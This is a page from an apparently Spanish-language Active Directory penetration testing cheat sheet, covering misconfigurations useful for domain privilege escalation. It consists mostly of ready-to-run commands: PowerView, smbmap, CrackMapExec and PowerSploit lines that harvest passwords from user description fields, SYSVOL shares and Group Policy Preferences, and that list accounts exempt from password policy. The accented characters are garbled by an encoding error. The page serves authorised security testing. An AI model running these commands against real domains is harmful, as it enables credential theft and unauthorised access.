馃數
Active Directory Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Herramientas
  • Recolecci贸n de informaci贸n y enumeraci贸n
    • Bypass protecciones PowerShell scripts
    • LLMNR/NBT-NS poisoning
    • Enumeraci贸n no autenticada
      • Enumeraci贸n de usuarios y grupos
      • Enumeraci贸n de pol铆tica de contrase帽as
    • Password spraying
    • Enumeraci贸n autenticada
      • BloodHound
      • Domain Name System (DNS)
      • Enumeraci贸n de dominios
      • Enumeraci贸n de usuarios, grupos y computadoras
      • Enumeraci贸n de recursos compartidos
      • Enumeraci贸n de pol铆tica de contrase帽as
      • Enumeraci贸n de Group Policy Object (GPO)
      • Enumeraci贸n de Access Control List (ACL)
      • Enumeraci贸n de relaciones de confianza de dominio
  • Movimiento lateral
    • User hunting
    • Microsoft SQL Server (MSSQL)
    • PowerShell remoting
    • Remote Desktop Protocol (RDP)
    • Server Message Block (SMB)
    • Windows Remote Management (WinRM)
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
  • Escalamiento de privilegios de dominio
    • Configuraciones incorrectas
    • Credential dumping
    • Usuarios y grupos
    • ASREPRoast
    • Kerberoast
    • DCSync
    • Unconstrained delegation
    • Constrained delegation
  • Escalamiento de privilegios en relaciones de confianza de dominio
    • Kerberoast
    • Foreign group membership
    • SID History
  • Persistencia
    • Golden Ticket
    • Silver Ticket
    • Skeleton Key
    • Directory Services Restore Mode (DSRM)
  • Vulnerabilidades
    • NoPac
    • PrintNightmare
Con tecnolog铆a de GitBook
En esta p谩gina
  • Informaci贸n confidencial
  • Campo descripci贸n de los usuarios
  • Recursos compartidos y scripts en SYSVOL
  • Group Policy Preferences (GPP)
  • CrackMapExec
  • PowerSploit
  • PASSWD_NOTREQD

驴Te fue 煤til?

  1. Escalamiento de privilegios de dominio

Configuraciones incorrectas

Informaci贸n confidencial

Campo descripci贸n de los usuarios

# PowerView
Get-DomainUser * | Select-Object SamAccountName, Description | Where-Object {$_.Description -ne $null}
Find-UserField -SearchField Description -SearchTerm "<search-pattern>"

Recursos compartidos y scripts en SYSVOL

smbmap -H <IP-address-DC> -d <ACME.LOCAL> -u <user> -p <password>
smbmap -H <IP-address-DC> -d <ACME.LOCAL> -u <user> -p <password> -R "SYSVOL"

Group Policy Preferences (GPP)

CrackMapExec

crackmapexec smb <IP-address-DC> -u <user> -p <password> -M gpp_password
crackmapexec smb <IP-address-DC> -u <user> -p <password> -M gpp_autologin

PowerSploit

# Get-GPPPassword.ps1
Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

# Get-GPPAutologon.ps1
Import-Module .\Get-GPPAutologon.ps1
Get-GPPAutologon
Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq

PASSWD_NOTREQD

El usuario no est谩 sujeto a la pol铆tica de contrase帽as, lo que significa que podr铆a tener una contrase帽a m谩s corta o ninguna contrase帽a (si se permiten contrase帽as vac铆as en el dominio).

# PowerView
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object SamAccountName, UserAccountControl
AnteriorPass the Ticket (PtT)SiguienteCredential dumping

脷ltima actualizaci贸n hace 2 a帽os

驴Te fue 煤til?